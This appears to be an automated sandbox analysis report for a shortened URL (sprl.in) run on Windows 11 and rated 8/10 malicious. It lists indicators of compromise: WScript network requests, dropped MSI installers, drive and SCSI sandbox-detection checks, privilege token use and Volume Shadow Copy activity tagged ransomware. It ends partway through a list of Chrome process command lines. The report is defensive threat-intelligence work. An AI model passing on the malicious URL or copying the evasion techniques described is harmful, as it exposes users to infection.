hxxps://sprl[.]in/wCJrEXQ

Analysis

max time kernel
788s
max time network
733s
platform
windows11-21h2_x64
resource
win11-20240221-en
resource tags

arch:x64arch:x86image:win11-20240221-enlocale:en-usos:windows11-21h2-x64system
submitted
28/02/2024, 14:55

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

https://sprl.in/wCJrEXQ

Score

8^/10

Malware Config

Signatures

Blocklisted process makes network request 6 IoCs

flow	pid	Process
14	2548	WScript.exe
15	2548	WScript.exe
16	2548	WScript.exe
17	2548	WScript.exe
19	2880	WScript.exe
22	3148	WScript.exe

Loads dropped DLL 3 IoCs

pid	Process
3124	MsiExec.exe
4940	MsiExec.exe
4740	MsiExec.exe

Enumerates connected drives 3 TTPs 64 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
File opened (read-only)	\??\H:	msiexec.exe
File opened (read-only)	\??\G:	msiexec.exe
File opened (read-only)	\??\M:	msiexec.exe
File opened (read-only)	\??\P:	msiexec.exe
File opened (read-only)	\??\X:	msiexec.exe
File opened (read-only)	\??\U:	msiexec.exe
File opened (read-only)	\??\B:	msiexec.exe
File opened (read-only)	\??\K:	msiexec.exe
File opened (read-only)	\??\R:	msiexec.exe
File opened (read-only)	\??\U:	msiexec.exe
File opened (read-only)	\??\Y:	msiexec.exe
File opened (read-only)	\??\H:	msiexec.exe
File opened (read-only)	\??\K:	msiexec.exe
File opened (read-only)	\??\A:	msiexec.exe
File opened (read-only)	\??\N:	msiexec.exe
File opened (read-only)	\??\W:	msiexec.exe
File opened (read-only)	\??\X:	msiexec.exe
File opened (read-only)	\??\J:	msiexec.exe
File opened (read-only)	\??\U:	msiexec.exe
File opened (read-only)	\??\Y:	msiexec.exe
File opened (read-only)	\??\Y:	msiexec.exe
File opened (read-only)	\??\I:	msiexec.exe
File opened (read-only)	\??\V:	msiexec.exe
File opened (read-only)	\??\J:	msiexec.exe
File opened (read-only)	\??\V:	msiexec.exe
File opened (read-only)	\??\I:	msiexec.exe
File opened (read-only)	\??\I:	msiexec.exe
File opened (read-only)	\??\J:	msiexec.exe
File opened (read-only)	\??\L:	msiexec.exe
File opened (read-only)	\??\B:	msiexec.exe
File opened (read-only)	\??\T:	msiexec.exe
File opened (read-only)	\??\Z:	msiexec.exe
File opened (read-only)	\??\V:	msiexec.exe
File opened (read-only)	\??\G:	msiexec.exe
File opened (read-only)	\??\V:	msiexec.exe
File opened (read-only)	\??\Z:	msiexec.exe
File opened (read-only)	\??\E:	msiexec.exe
File opened (read-only)	\??\A:	msiexec.exe
File opened (read-only)	\??\N:	msiexec.exe
File opened (read-only)	\??\O:	msiexec.exe
File opened (read-only)	\??\R:	msiexec.exe
File opened (read-only)	\??\W:	msiexec.exe
File opened (read-only)	\??\E:	msiexec.exe
File opened (read-only)	\??\T:	msiexec.exe
File opened (read-only)	\??\G:	msiexec.exe
File opened (read-only)	\??\B:	msiexec.exe
File opened (read-only)	\??\M:	msiexec.exe
File opened (read-only)	\??\P:	msiexec.exe
File opened (read-only)	\??\W:	msiexec.exe
File opened (read-only)	\??\L:	msiexec.exe
File opened (read-only)	\??\H:	msiexec.exe
File opened (read-only)	\??\A:	msiexec.exe
File opened (read-only)	\??\L:	msiexec.exe
File opened (read-only)	\??\S:	msiexec.exe
File opened (read-only)	\??\Q:	msiexec.exe
File opened (read-only)	\??\T:	msiexec.exe
File opened (read-only)	\??\Y:	msiexec.exe
File opened (read-only)	\??\P:	msiexec.exe
File opened (read-only)	\??\U:	msiexec.exe
File opened (read-only)	\??\O:	msiexec.exe
File opened (read-only)	\??\P:	msiexec.exe
File opened (read-only)	\??\Z:	msiexec.exe
File opened (read-only)	\??\K:	msiexec.exe
File opened (read-only)	\??\X:	msiexec.exe

Drops file in Windows directory 10 IoCs

description	ioc	Process
File created	C:\Windows\Installer\e5829f9.msi	msiexec.exe
File opened for modification	C:\Windows\Installer\e5829f9.msi	msiexec.exe
File opened for modification	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log	msiexec.exe
File created	C:\Windows\Installer\e5829fa.msi	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIEAE9.tmp	msiexec.exe
File created	C:\Windows\Installer\e5829fb.msi	msiexec.exe
File opened for modification	C:\Windows\Installer\e5829fb.msi	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI2A76.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\e5829fa.msi	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI4781.tmp	msiexec.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Checks SCSI registry key(s) 3 TTPs 8 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A	taskmgr.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName	taskmgr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters	vssvc.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters	vssvc.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters\Partmgr	vssvc.exe
Set value (data)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters\Partmgr\PartitionTableCache = 0000000004000000707bd4850afa18e80000000000000000000000000000000000000000000000000000000000000000000000000000000000001000000000000000c01200000000ffffffff000000002701010000080000707bd4850000000000001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000d01200000000000020ed3a000000ffffffff000000000700010000680900707bd485000000000000d012000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000f0ff3a0000000000000005000000ffffffff000000000700010000f87f1d707bd485000000000000f0ff3a00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff000000000000000000000000707bd48500000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000	vssvc.exe
Set value (data)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters\Partmgr\SnapshotDataCache = 534e41505041525401000000700000008ec7416a0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000	vssvc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000	taskmgr.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe

Modifies Internet Explorer settings 1 TTPs 1 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-647252928-2816094679-1307623958-1000\Software\Microsoft\Internet Explorer\GPU	WebExperienceHostApp.exe

Modifies data under HKEY_USERS 7 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133536057750353434"	chrome.exe
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	WebExperienceHostApp.exe
Key created	\REGISTRY\USER\S-1-5-19	WebExperienceHostApp.exe
Key created	\REGISTRY\USER\S-1-5-19\Software	WebExperienceHostApp.exe
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft	WebExperienceHostApp.exe
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography	WebExperienceHostApp.exe

Modifies registry class 23 IoCs

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-647252928-2816094679-1307623958-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Settings\Cache\History\CachePrefix = "Visited:"	WebExperienceHostApp.exe
Key created	\REGISTRY\USER\S-1-5-21-647252928-2816094679-1307623958-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Explorer\EdpDomStorage	WebExperienceHostApp.exe
Key created	\REGISTRY\USER\S-1-5-21-647252928-2816094679-1307623958-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Explorer\DOMStorage\client.cbs	WebExperienceHostApp.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-647252928-2816094679-1307623958-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\client.cbs\NumberOfSubdomains = "0"	WebExperienceHostApp.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-647252928-2816094679-1307623958-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Settings\Cache\Content\CachePrefix	BackgroundTransferHost.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-647252928-2816094679-1307623958-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:"	BackgroundTransferHost.exe
Key created	\REGISTRY\USER\S-1-5-21-647252928-2816094679-1307623958-1000_Classes\Local Settings\MuiCache	MiniSearchHost.exe
Key created	\REGISTRY\USER\S-1-5-21-647252928-2816094679-1307623958-1000_Classes\Local Settings	cmd.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-647252928-2816094679-1307623958-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Explorer\DOMStorage\client.cbs\NumberOfSubdomains = "0"	WebExperienceHostApp.exe
Key created	\REGISTRY\USER\S-1-5-21-647252928-2816094679-1307623958-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Explorer\DomStorageState	WebExperienceHostApp.exe
Key created	\REGISTRY\USER\S-1-5-21-647252928-2816094679-1307623958-1000_Classes\Local Settings	cmd.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-647252928-2816094679-1307623958-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Settings\Cache\Content\CachePrefix	WebExperienceHostApp.exe
Key created	\REGISTRY\USER\S-1-5-21-647252928-2816094679-1307623958-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Explorer\DOMStorage	WebExperienceHostApp.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-647252928-2816094679-1307623958-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Explorer\DOMStorage\client.cbs\ = "0"	WebExperienceHostApp.exe
Key created	\REGISTRY\USER\S-1-5-21-647252928-2816094679-1307623958-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\client.cbs	WebExperienceHostApp.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-647252928-2816094679-1307623958-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Explorer\DOMStorage\client.cbs\NumberOfSubdomains = "1"	WebExperienceHostApp.exe
Key created	\REGISTRY\USER\S-1-5-21-647252928-2816094679-1307623958-1000_Classes\Local Settings	cmd.exe
Key created	\REGISTRY\USER\S-1-5-21-647252928-2816094679-1307623958-1000_Classes\Local Settings\MuiCache	WebExperienceHostApp.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-647252928-2816094679-1307623958-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:"	WebExperienceHostApp.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-647252928-2816094679-1307623958-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\client.cbs\ = "0"	WebExperienceHostApp.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-647252928-2816094679-1307623958-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Settings\Cache\History\CachePrefix = "Visited:"	BackgroundTransferHost.exe
Key created	\REGISTRY\USER\S-1-5-21-647252928-2816094679-1307623958-1000_Classes\Local Settings\MuiCache	BackgroundTransferHost.exe
Key created	\REGISTRY\USER\S-1-5-21-647252928-2816094679-1307623958-1000_Classes\Local Settings	chrome.exe

NTFS ADS 1 IoCs

description	ioc	Process
File opened for modification	C:\Users\Admin\Downloads\[email protected]:Zone.Identifier	chrome.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
3788	chrome.exe
3788	chrome.exe
3088	msiexec.exe
3088	msiexec.exe
3088	msiexec.exe
3088	msiexec.exe
3088	msiexec.exe
3088	msiexec.exe
1640	chrome.exe
1640	chrome.exe
5076	taskmgr.exe
5076	taskmgr.exe
5076	taskmgr.exe
5076	taskmgr.exe
5076	taskmgr.exe
5076	taskmgr.exe
5076	taskmgr.exe
5076	taskmgr.exe
5076	taskmgr.exe
5076	taskmgr.exe
5076	taskmgr.exe
5076	taskmgr.exe
5076	taskmgr.exe
5076	taskmgr.exe
5076	taskmgr.exe
5076	taskmgr.exe
5076	taskmgr.exe
5076	taskmgr.exe
5076	taskmgr.exe
5076	taskmgr.exe
5076	taskmgr.exe
5076	taskmgr.exe
5076	taskmgr.exe
5076	taskmgr.exe
5076	taskmgr.exe
5076	taskmgr.exe
5076	taskmgr.exe
5076	taskmgr.exe
5076	taskmgr.exe
5076	taskmgr.exe
5076	taskmgr.exe
5076	taskmgr.exe
5076	taskmgr.exe
5076	taskmgr.exe
5076	taskmgr.exe
5076	taskmgr.exe
5076	taskmgr.exe
5076	taskmgr.exe
5076	taskmgr.exe
5076	taskmgr.exe
5076	taskmgr.exe
5076	taskmgr.exe
5076	taskmgr.exe
5076	taskmgr.exe
5076	taskmgr.exe
5076	taskmgr.exe
5076	taskmgr.exe
5076	taskmgr.exe
5076	taskmgr.exe
5076	taskmgr.exe
5076	taskmgr.exe
5076	taskmgr.exe
5076	taskmgr.exe
5076	taskmgr.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
5076	taskmgr.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 2 IoCs

pid	Process
3788	chrome.exe
3788	chrome.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeShutdownPrivilege	3788	chrome.exe
Token: SeCreatePagefilePrivilege	3788	chrome.exe
Token: SeShutdownPrivilege	3788	chrome.exe
Token: SeCreatePagefilePrivilege	3788	chrome.exe
Token: SeShutdownPrivilege	3788	chrome.exe
Token: SeCreatePagefilePrivilege	3788	chrome.exe
Token: SeShutdownPrivilege	3788	chrome.exe
Token: SeCreatePagefilePrivilege	3788	chrome.exe
Token: SeShutdownPrivilege	3788	chrome.exe
Token: SeCreatePagefilePrivilege	3788	chrome.exe
Token: SeShutdownPrivilege	3788	chrome.exe
Token: SeCreatePagefilePrivilege	3788	chrome.exe
Token: SeShutdownPrivilege	3788	chrome.exe
Token: SeCreatePagefilePrivilege	3788	chrome.exe
Token: SeShutdownPrivilege	3788	chrome.exe
Token: SeCreatePagefilePrivilege	3788	chrome.exe
Token: SeShutdownPrivilege	3788	chrome.exe
Token: SeCreatePagefilePrivilege	3788	chrome.exe
Token: SeShutdownPrivilege	3788	chrome.exe
Token: SeCreatePagefilePrivilege	3788	chrome.exe
Token: SeShutdownPrivilege	3788	chrome.exe
Token: SeCreatePagefilePrivilege	3788	chrome.exe
Token: SeShutdownPrivilege	3788	chrome.exe
Token: SeCreatePagefilePrivilege	3788	chrome.exe
Token: SeShutdownPrivilege	3788	chrome.exe
Token: SeCreatePagefilePrivilege	3788	chrome.exe
Token: SeShutdownPrivilege	3788	chrome.exe
Token: SeCreatePagefilePrivilege	3788	chrome.exe
Token: SeShutdownPrivilege	3788	chrome.exe
Token: SeCreatePagefilePrivilege	3788	chrome.exe
Token: SeShutdownPrivilege	3788	chrome.exe
Token: SeCreatePagefilePrivilege	3788	chrome.exe
Token: SeShutdownPrivilege	3788	chrome.exe
Token: SeCreatePagefilePrivilege	3788	chrome.exe
Token: SeShutdownPrivilege	3788	chrome.exe
Token: SeCreatePagefilePrivilege	3788	chrome.exe
Token: SeShutdownPrivilege	3788	chrome.exe
Token: SeCreatePagefilePrivilege	3788	chrome.exe
Token: SeShutdownPrivilege	3788	chrome.exe
Token: SeCreatePagefilePrivilege	3788	chrome.exe
Token: SeShutdownPrivilege	3788	chrome.exe
Token: SeCreatePagefilePrivilege	3788	chrome.exe
Token: SeShutdownPrivilege	4140	msiexec.exe
Token: SeIncreaseQuotaPrivilege	4140	msiexec.exe
Token: SeSecurityPrivilege	3088	msiexec.exe
Token: SeCreateTokenPrivilege	4140	msiexec.exe
Token: SeAssignPrimaryTokenPrivilege	4140	msiexec.exe
Token: SeLockMemoryPrivilege	4140	msiexec.exe
Token: SeIncreaseQuotaPrivilege	4140	msiexec.exe
Token: SeMachineAccountPrivilege	4140	msiexec.exe
Token: SeTcbPrivilege	4140	msiexec.exe
Token: SeSecurityPrivilege	4140	msiexec.exe
Token: SeTakeOwnershipPrivilege	4140	msiexec.exe
Token: SeLoadDriverPrivilege	4140	msiexec.exe
Token: SeSystemProfilePrivilege	4140	msiexec.exe
Token: SeSystemtimePrivilege	4140	msiexec.exe
Token: SeProfSingleProcessPrivilege	4140	msiexec.exe
Token: SeIncBasePriorityPrivilege	4140	msiexec.exe
Token: SeCreatePagefilePrivilege	4140	msiexec.exe
Token: SeCreatePermanentPrivilege	4140	msiexec.exe
Token: SeBackupPrivilege	4140	msiexec.exe
Token: SeRestorePrivilege	4140	msiexec.exe
Token: SeShutdownPrivilege	4140	msiexec.exe
Token: SeDebugPrivilege	4140	msiexec.exe

Suspicious use of FindShellTrayWindow 64 IoCs

pid	Process
3788	chrome.exe
3788	chrome.exe
3788	chrome.exe
3788	chrome.exe
3788	chrome.exe
3788	chrome.exe
3788	chrome.exe
3788	chrome.exe
3788	chrome.exe
3788	chrome.exe
3788	chrome.exe
3788	chrome.exe
3788	chrome.exe
3788	chrome.exe
3788	chrome.exe
3788	chrome.exe
3788	chrome.exe
3788	chrome.exe
3788	chrome.exe
3788	chrome.exe
3788	chrome.exe
3788	chrome.exe
3788	chrome.exe
3788	chrome.exe
3788	chrome.exe
3788	chrome.exe
3788	chrome.exe
3788	chrome.exe
3788	chrome.exe
3788	chrome.exe
3788	chrome.exe
3788	chrome.exe
3788	chrome.exe
4140	msiexec.exe
4140	msiexec.exe
2152	msiexec.exe
2152	msiexec.exe
1032	msiexec.exe
1032	msiexec.exe
5076	taskmgr.exe
5076	taskmgr.exe
5076	taskmgr.exe
5076	taskmgr.exe
5076	taskmgr.exe
5076	taskmgr.exe
5076	taskmgr.exe
5076	taskmgr.exe
5076	taskmgr.exe
5076	taskmgr.exe
5076	taskmgr.exe
5076	taskmgr.exe
5076	taskmgr.exe
5076	taskmgr.exe
5076	taskmgr.exe
5076	taskmgr.exe
5076	taskmgr.exe
5076	taskmgr.exe
5076	taskmgr.exe
5076	taskmgr.exe
5076	taskmgr.exe
5076	taskmgr.exe
5076	taskmgr.exe
5076	taskmgr.exe
5076	taskmgr.exe

Suspicious use of SendNotifyMessage 64 IoCs

pid	Process
3788	chrome.exe
3788	chrome.exe
3788	chrome.exe
3788	chrome.exe
3788	chrome.exe
3788	chrome.exe
3788	chrome.exe
3788	chrome.exe
3788	chrome.exe
3788	chrome.exe
3788	chrome.exe
3788	chrome.exe
5076	taskmgr.exe
5076	taskmgr.exe
5076	taskmgr.exe
5076	taskmgr.exe
5076	taskmgr.exe
5076	taskmgr.exe
5076	taskmgr.exe
5076	taskmgr.exe
5076	taskmgr.exe
5076	taskmgr.exe
5076	taskmgr.exe
5076	taskmgr.exe
5076	taskmgr.exe
5076	taskmgr.exe
5076	taskmgr.exe
5076	taskmgr.exe
5076	taskmgr.exe
5076	taskmgr.exe
5076	taskmgr.exe
5076	taskmgr.exe
5076	taskmgr.exe
5076	taskmgr.exe
5076	taskmgr.exe
5076	taskmgr.exe
5076	taskmgr.exe
5076	taskmgr.exe
5076	taskmgr.exe
5076	taskmgr.exe
5076	taskmgr.exe
5076	taskmgr.exe
5076	taskmgr.exe
5076	taskmgr.exe
5076	taskmgr.exe
5076	taskmgr.exe
5076	taskmgr.exe
5076	taskmgr.exe
5076	taskmgr.exe
5076	taskmgr.exe
5076	taskmgr.exe
5076	taskmgr.exe
5076	taskmgr.exe
5076	taskmgr.exe
5076	taskmgr.exe
5076	taskmgr.exe
5076	taskmgr.exe
5076	taskmgr.exe
5076	taskmgr.exe
5076	taskmgr.exe
5076	taskmgr.exe
5076	taskmgr.exe
5076	taskmgr.exe
5076	taskmgr.exe

Suspicious use of SetWindowsHookEx 2 IoCs

pid	Process
348	MiniSearchHost.exe
2224	WebExperienceHostApp.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3788 wrote to memory of 3052	3788	chrome.exe	78
PID 3788 wrote to memory of 3052	3788	chrome.exe	78
PID 3788 wrote to memory of 1124	3788	chrome.exe	82
PID 3788 wrote to memory of 1124	3788	chrome.exe	82
PID 3788 wrote to memory of 1124	3788	chrome.exe	82
PID 3788 wrote to memory of 1124	3788	chrome.exe	82
PID 3788 wrote to memory of 1124	3788	chrome.exe	82
PID 3788 wrote to memory of 1124	3788	chrome.exe	82
PID 3788 wrote to memory of 1124	3788	chrome.exe	82
PID 3788 wrote to memory of 1124	3788	chrome.exe	82
PID 3788 wrote to memory of 1124	3788	chrome.exe	82
PID 3788 wrote to memory of 1124	3788	chrome.exe	82
PID 3788 wrote to memory of 1124	3788	chrome.exe	82
PID 3788 wrote to memory of 1124	3788	chrome.exe	82
PID 3788 wrote to memory of 1124	3788	chrome.exe	82
PID 3788 wrote to memory of 1124	3788	chrome.exe	82
PID 3788 wrote to memory of 1124	3788	chrome.exe	82
PID 3788 wrote to memory of 1124	3788	chrome.exe	82
PID 3788 wrote to memory of 1124	3788	chrome.exe	82
PID 3788 wrote to memory of 1124	3788	chrome.exe	82
PID 3788 wrote to memory of 1124	3788	chrome.exe	82
PID 3788 wrote to memory of 1124	3788	chrome.exe	82
PID 3788 wrote to memory of 1124	3788	chrome.exe	82
PID 3788 wrote to memory of 1124	3788	chrome.exe	82
PID 3788 wrote to memory of 1124	3788	chrome.exe	82
PID 3788 wrote to memory of 1124	3788	chrome.exe	82
PID 3788 wrote to memory of 1124	3788	chrome.exe	82
PID 3788 wrote to memory of 1124	3788	chrome.exe	82
PID 3788 wrote to memory of 1124	3788	chrome.exe	82
PID 3788 wrote to memory of 1124	3788	chrome.exe	82
PID 3788 wrote to memory of 1124	3788	chrome.exe	82
PID 3788 wrote to memory of 1124	3788	chrome.exe	82
PID 3788 wrote to memory of 1124	3788	chrome.exe	82
PID 3788 wrote to memory of 1124	3788	chrome.exe	82
PID 3788 wrote to memory of 1124	3788	chrome.exe	82
PID 3788 wrote to memory of 1124	3788	chrome.exe	82
PID 3788 wrote to memory of 1124	3788	chrome.exe	82
PID 3788 wrote to memory of 1124	3788	chrome.exe	82
PID 3788 wrote to memory of 1124	3788	chrome.exe	82
PID 3788 wrote to memory of 1124	3788	chrome.exe	82
PID 3788 wrote to memory of 1520	3788	chrome.exe	83
PID 3788 wrote to memory of 1520	3788	chrome.exe	83
PID 3788 wrote to memory of 4028	3788	chrome.exe	84
PID 3788 wrote to memory of 4028	3788	chrome.exe	84
PID 3788 wrote to memory of 4028	3788	chrome.exe	84
PID 3788 wrote to memory of 4028	3788	chrome.exe	84
PID 3788 wrote to memory of 4028	3788	chrome.exe	84
PID 3788 wrote to memory of 4028	3788	chrome.exe	84
PID 3788 wrote to memory of 4028	3788	chrome.exe	84
PID 3788 wrote to memory of 4028	3788	chrome.exe	84
PID 3788 wrote to memory of 4028	3788	chrome.exe	84
PID 3788 wrote to memory of 4028	3788	chrome.exe	84
PID 3788 wrote to memory of 4028	3788	chrome.exe	84
PID 3788 wrote to memory of 4028	3788	chrome.exe	84
PID 3788 wrote to memory of 4028	3788	chrome.exe	84
PID 3788 wrote to memory of 4028	3788	chrome.exe	84
PID 3788 wrote to memory of 4028	3788	chrome.exe	84
PID 3788 wrote to memory of 4028	3788	chrome.exe	84
PID 3788 wrote to memory of 4028	3788	chrome.exe	84
PID 3788 wrote to memory of 4028	3788	chrome.exe	84
PID 3788 wrote to memory of 4028	3788	chrome.exe	84
PID 3788 wrote to memory of 4028	3788	chrome.exe	84
PID 3788 wrote to memory of 4028	3788	chrome.exe	84
PID 3788 wrote to memory of 4028	3788	chrome.exe	84

Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --disable-background-networking --disable-component-update --simulate-outdated-no-au='Tue, 31 Dec 2099 23:59:59 GMT' --single-argument https://sprl.in/wCJrEXQ
1⤵
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:3788
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffc54c89758,0x7ffc54c89768,0x7ffc54c89778
  2⤵
  PID:3052
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1684 --field-trial-handle=1840,i,72756528679923834,8045849469379936790,131072 /prefetch:2
  2⤵
  PID:1124
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2116 --field-trial-handle=1840,i,72756528679923834,8045849469379936790,131072 /prefetch:8
  2⤵
  PID:1520
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2208 --field-trial-handle=1840,i,72756528679923834,8045849469379936790,131072 /prefetch:8
  2⤵
  PID:4028
- C:\Program Files\Google\Chrome\Application\chrome.exe
